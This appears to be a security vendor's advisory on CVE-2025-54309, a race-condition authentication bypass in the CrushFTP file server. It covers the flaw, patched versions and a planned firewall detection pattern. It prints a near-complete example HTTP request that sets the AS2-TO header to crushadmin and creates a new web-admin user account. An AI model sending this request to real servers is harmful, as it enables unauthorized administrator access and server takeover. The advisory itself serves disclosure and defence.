This vulnerability is an authentication bypass in CrushFTP. An attacker can bypass authentication and create an administrator account by sending a request containing a crafted AS2-TO header and a separate administrator-account-creation request in a short time interval. A patch for this vulnerability was released on July 18, 2025. Our AIWAF product will address this issue with the "CrushFTP Authentication Bypass" pattern, which is planned for inclusion in the September 2025 pattern update.
1. Overview
CrushFTP is a cross-platform file-transfer server that supports FTP, SFTP, HTTP/S, WebDAV, and other protocols. It is used by individuals and organizations of various sizes. This report summarizes analysis of the recent authentication-bypass vulnerability CVE-2025-54309 discovered in the product.
Source : https://www.crushftp.com/index.html
2. Attack Type
CVE-2025-54309 was disclosed when CrushFTP released a patch in July 2025 and was promptly added to lists of vulnerabilities with observed exploitation.
This vulnerability is a race-condition–based authentication bypass that abuses weak AS2 protocol validation logic used by the server. An attacker manipulates the AS2-TO header value in requests sent to the server to \crushadmin, which can cause privilege elevation to an internal administrator account. A single crafted request alone does not enable immediate misuse of elevated privileges. However, if the attacker quickly follows that request with a separate administrator-account-creation request, the two requests can race such that the account-creation operation executes under the elevated (built-in administrator) context — resulting in creation of an administrative account.
Example attack request:
POST /WebInterface/function/ HTTP/1.1
Host: www.test.com
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
AS2-TO: \crushadmin
Content-Type: disposition-notification
X-Requested-With: XMLHttpRequest
Cookie: CrushAuth=1755628505894_6BIIu82Vk0lI9naqUFa0zdjXuOZgDeQ5; currentAuth=DeQ5
Content-Length: 785
command=setUserItem&data_action=new&serverGroup=MainUsers&username=testing_hacker&user=<?xml version="1.0" encoding="UTF-8"?><user type="properties"><max_logins_ip>8</max_logins_ip><real_path_to_user>./users/MainUsers/crushadmin/</real_path_to_user><root_dir>/</root_dir><user_name>CENSORED</user_name><version>1.0</version><max_logins>0</max_logins><last_logins>03/28/2025 03:00:26 PM</last_logins><password>NEWPASSWORD</password><site>(CONNECT)(WEB_ADMIN)</site><ignore_max_logins>true</ignore_max_logins><max_idle_time>0</max_idle_time><username>CENSORED</username></user>&xmlItem=user&vfs_items=<?xml version="1.0" encoding="UTF-8"?><vfs type="vector"></vfs>&permissions=<?xml version="1.0" encoding="UTF-8"?><VFS type="properties"><item name="/">(read)(view)(resume)</item></VFS>&c2f=DeQ5
3. Mitigation Measures
CrushFTP released a patch for CVE-2025-54309 on July 18, 2025. According to researchers who analyzed the vulnerability, it was actively exploited prior to the patch publication; some analysts have commented that the patch was released late relative to observed abuse. If you operate CrushFTP, confirm your version and upgrade to 10.8.5, 11.3.4_23, or later as applicable.
Our AIWAF product will mitigate this vulnerability via the "CrushFTP Authentication Bypass" pattern planned for the September 2025 pattern update.
Source : https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025
4. Conclusion
CrushFTP is a cross-platform file-transfer server used by individuals, SMBs, and some larger organizations. CVE-2025-54309 has known exploitation cases and active attack attempts; therefore, customers using this product should promptly apply the available updates and move to patched versions. Our Threat Analysis (TA) team continues to monitor vulnerabilities affecting CrushFTP and will respond rapidly to new related findings.
